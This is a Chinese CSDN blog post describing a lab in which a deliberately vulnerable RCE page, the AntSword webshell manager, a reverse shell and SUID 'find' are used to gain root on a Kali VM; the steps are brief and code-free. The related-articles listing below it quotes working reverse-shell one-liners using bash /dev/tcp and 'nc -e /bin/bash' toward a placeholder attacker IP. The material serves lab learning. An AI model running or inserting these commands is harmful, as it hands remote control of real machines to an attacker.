Linux通过反弹Shell提权实验

最新推荐文章于 2024-05-17 16:41:20 发布
最新推荐文章于 2024-05-17 16:41:20 发布
阅读量912 收藏 4
点赞数
分类专栏: 靶场和实验集合 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59201520/article/details/129129691
版权

实验准备:

蚁剑,两个 kali 环境(一个开启 web 服务(开NAT),一个接收 shell(开桥接))

实验步骤:

kali 上创建一个有 rce 漏洞的页面,并开启 web 服务

可以直接用 vim xxxx.xxx 命令进行创建和编辑

  ②在物理机浏览器验证RCE漏洞,并通过蚁剑进行连接

 

 ③在蚁剑上打开终端,输入反弹shell的指令,并在接收shell的Kali上开启监听服务,找到可利用的特权命令find

④利用这个命令获取root权限

 ⑤再打开一个终端,开启新的监听并把这个弹到新的Shell上面

 

 

 ⑥最后在新的监听口进行Whoami查询当前身份,权限为root,实验结束

 

 

Lil.Jave
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用nc反弹cmdshell
01-27
利用nc反弹cmdshell 利用nc反弹cmdshell 利用nc反弹cmdshell
Linux第一篇-Linux内核漏洞(以CVE-2015-1328为例)
Love&Share
11-18 4453
文章目录Linux内核漏洞shell附件 Linux内核漏洞 一般webshell拿到的限都是web容器限,如iis就是iss用户组限,apache就是apache 限,可以执行普通命令,但是如果要进行内网渗透就需要拿到系统限或者超级管理员linux首先需要创建交互shell 靶机环境Ubuntu15.04 保证主机与靶机之间可以连通 拿shell 利用已有的web漏洞,如文件上传,命令执行等上传一句话木马,得到交互式shell 假如web界面存在文件上传 测试.
拿到GETSHELL之后的
weixin_69678131的博客
05-12 1235
getshell之后的
linux编程SHELL编程实验报告
10-14
linux编程SHELL编程实验报告
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
网络安全——使用反弹木马进行获取主机Shell
Jay
07-20 1517
在页面的右边找到404.php的模板代码修改页面,直接将一句话木马的内容写入404页面中,如
Web安全-AntSword(中国蚁剑)Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 5219
Web安全-AntSword(中国蚁剑)Webshell管理工具使用
059 反弹shell
鸡蛋炒鸡蛋
04-07 3958
文章目录一:升概述二:windows2.1: 启动项2.2:系统漏洞2.2.1:笔记2.2.2:实验 一:升概述 水平升(越) 同级账户间切换身份,比如有ABC三个用户,AB是普通用户只能自己发帖,然后只能删除自己的贴,C是管理员能删除所有人的帖子,然后突然A可以删除B的帖子了,这就是越。 垂直升 普通用户获得了管理员的限 web用户直接成管理员用户     二:windows: 基于webshell,也就是说目标机器存在大马文
getshell
inslight的博客
09-22 1405
getshell
,远程连接控制目标。
qq_57663276的博客
09-15 821
未知攻,何来防。网络安全靶场学习:,远程连接控制目标。
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
cmd反弹shell
10-24
cmd反弹shell
西南科大+Linux实验报告+shell程序开发
01-26
一、实验目的 任务一:掌握Shell编程的基本特点。 任务二:掌握shell脚本的编写 任务三:应用Shell程序设计方法,能分析Shell程序结构;掌握Shell程序开发环境的使用;能根据Shell程序功能、安全管理方面的需求,设计Shell程序;通过组织或参与开源项目开发,掌握项目开发、管理的方法和技术;能口头表达项目开发情况。
反弹shell
一纸荒芜的博客
08-01 1853
网安面试常见问题
蚁剑渗透测试
Lu__xiao的博客
01-15 3904
一、应用场景 对于本实验,我的理解是基于对方服务器存在文件上传漏洞,已经被上传一句话木马,这时我们通过蚁剑去做一个渗透攻击,目标是控制对方的服务器。 实验目标:1. 学会蚁剑的攻击方法; 2. 通过 Wireshark 抓取数据包进行分析; 本次实验需要一个攻击方和服务器 这里本机为服务器 IP地址:192.168.0.142 环境需求:phpstudy (模拟服务器)、Wireshark 抓包工具(进行抓宝分析) 虚拟机...
DC系列靶机渗透之DC-3
weixin_52515588的博客
06-08 382
利用arp -scan -l扫描主机然后利用nmap查看开放的端口,如上图所示,80端口开放,那么接下来我们可以利用这个信息进行渗透访问一下80端口得到如上图所示的信息。然后使用whatweb对网站进行扫描,得到如下信息,可以知道网站是利用joomla部署的,那么我们就可以利用joomscan扫描 利用扫描工具扫出了网站后台,我们利用浏览器登录 如上图所示。我们在上述扫描结果中,能够看出来使用的joomla版本,接下来我们就可以利用msf查找漏洞 我们发现存在sql注入漏洞根据示的路径,我们查看文件内容如
反弹shell
热门推荐
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
linux总结
记录学习,一起进步
07-16 570
linux总结
linux---进程通信
最新发布
m0_74979625的博客
05-17 551
示:以下是本篇文章正文内容,下面案例可供参考。
linux反弹shell
09-03
Linux反弹Shell是一种通过建立网络连接,将受攻击计算机的Shell会话连接到攻击者的计算机上的技术。这种技术通常用于渗透测试或者恶意攻击。 在Linux上,可以使用多种方法来实现反弹Shell。以下是其中一种常见的方法: 1. 通过netcat命令(nc): - 在攻击者计算机上监听某个端口,例如:`nc -lvp <port>` - 在受攻击的Linux系统上执行命令,将Shell连接到攻击者的计算机:`nc <attacker_ip> <port> -e /bin/bash` - 如果一切正常,你将获得一个反弹Shell会话。 请注意,反弹Shell是一种潜在的非法活动,可能会侵犯他人的隐私和违反法律法规。只有在合法和授的情况下,才能使用此技术进行安全测试或其他合法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值